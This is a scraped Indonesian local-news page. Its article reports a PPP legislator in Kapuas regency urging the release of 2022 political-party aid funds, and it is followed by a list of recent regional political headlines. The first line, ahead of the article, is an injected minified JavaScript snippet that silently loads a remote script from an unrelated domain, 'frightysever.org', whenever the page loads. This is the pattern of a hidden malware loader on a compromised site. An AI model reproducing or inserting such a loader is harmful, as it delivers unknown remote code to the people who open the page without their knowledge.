(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kapuas

Legislator PPP Minta Dana Parpol 2022 Segera Dicairkan


KANALKALIMANTAN.COM, KUALA KAPUAS – Anggota DPRD Kabupaten Kapuas dari Partai Persatuan Pembangunan (PPP), H Darwandie mengharapkan dana bantuan bagi partai politik (parpol) bisa segera direalisasikan pemerintah daerah.

“Mewakili kawan-kawan parpol saya pikir kepentingannya sama, terkait realisasi dana bantuan parpol tahun anggaran 2022,” kata Darwandie, Selasa (7/6/2022).

DPC PPP Kapuas juga telah melakukan konfirmasi dengan Badan Kesbangpol Kabupaten Kapuas bahwa di DPA Kesbangpol dana itu sudah tersedia sesuai dengan anggaran yang sudah ditetapkan dalam Perda APBD tahun 2022.

“Yang dipertanyakan oparpol saat ini kapan dana itu bisa direalisasikan. Mengingat bahwa tahun 2022 ini berdasarkan siklus yang sudah ditetapkan secara nasional parpol mulai melakukan pendaftaran parpol sejak 1 Juli 2022. Nah, pendaftaran parpol itu memiliki syarat dan prasyarat mutlak,” ucapnya.

 

Baca juga  : Program TJSL PLN, Bantuan Fasilitas Pendidikan Diserahkan ke MTs Syekh Khalid

Terutama dalam menunjang kesiapan parpol melakukan konsolidasi organisasi mempersiapkan administrasi teknis sebagai pendukung parpol di dalam pendaftaran parpol peserta pemilu.

“Tentu tahun ini beban parpol semakin banyak nah dana bantuan parpol ini sangat dibutuhkan untuk kegiatan itu,” ucapnya.

Setelah konfirmasi kepada Kesbangpol Kabupaten Kapuas ternyata yang menjadi kesulitan saat ini adalah tim verifikasi provinsi belum terbentuk.

“Ada kabar sudah terbentuk, tetapi SK belum ditandatangani gubernur. Oleh karena itu parpol memohon, kalau itu yang menjadi hambatan mohon kepada provinsi agar segera realisasikan tim verifikasi itu,” tutur Darwandie.

“Karena dana ini sangat dibutuhkan parpol dalam rangka persiapkan diri melakukan kegiatan pendaftaran parpol jadi peserta pemilu,” pungkasnya. (Kanalkalimantan.com/ags)

Reporter : ags
Editor : kk


Desy Arfianty

Recent Posts

5 Nama Pendaftar Bacalon Pilwali Banjarbaru ke PDIP

KANALKALIMANTAN.COM, BANJARBARU - Lima buah formulir pendaftaran diambil oleh lima orang bakal calon Pilkada 2024… Read More

3 jam ago

Acil Odah Resmi Lamar Golkar Maju Pilgub Kalsel 2024

KANALKALIMANTAN.COM, BANJARMASIN - Langkah Hj Raudatul Jannah alias Acil Odah untuk maju pada kontestasi Pemilihan… Read More

3 jam ago

Golkar Banjarbaru Buka Penjaringan Bakal Calon Wali Kota

KANALKALIMANTAN.COM, BANJARBARU - DPD Partai Golkar Kota Banjarbaru membuka pendaftaran bakal calon Wali Kota dan… Read More

4 jam ago

Soal Pungutan Acara Perpisahan Siswa, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru menyikapi persoalan iuran kegiatan acara… Read More

7 jam ago

Pungutan Acara Perpisahaan Siswa, Begini Respon Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Menyikapi pungutan acara perpisahan siswa sekolah di Banjarbaru, Wali Kota Banjarbaru Aditya… Read More

8 jam ago

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

19 jam ago

This website uses cookies.